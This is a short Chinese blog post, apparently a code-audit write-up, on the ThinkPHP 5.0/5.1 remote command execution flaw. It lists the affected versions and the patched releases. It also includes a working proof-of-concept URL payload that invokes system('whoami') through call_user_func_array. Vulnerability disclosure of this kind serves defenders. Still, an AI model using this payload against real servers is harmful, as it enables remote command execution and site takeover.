头像

Mr_Tcsy

《ThinkPHP 远程命令执行漏洞》

 4周前  •   代码审计  •     •   19  •   0

由于 ThinkPHP 框架对控制器名没有进行足够的检测,在没有开启强制路由的情况下,攻击者可能利用该问题植入后门。

影响范围: ThinkPHP 5.0.x 系列: 5.0.23 之前的所有版本

影响范围:ThinkPHP 5.1.x 系列: 5.1.31 之前的所有版本

  已修复版本:
  ThinkPHP 5.0.23 : https://github.com/top-think/framework/archive/v5.0.23.zip
  ThinkPHP 5.1.31 : https://github.com/top-think/framework/archive/v5.1.31.zip


Payload:
http://127.0.0.1/tp5/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
TIM截图20181211103908.png
上一篇:
下一篇:

 评论


 已有0条评论

    还没有任何评论,你来说两句吧!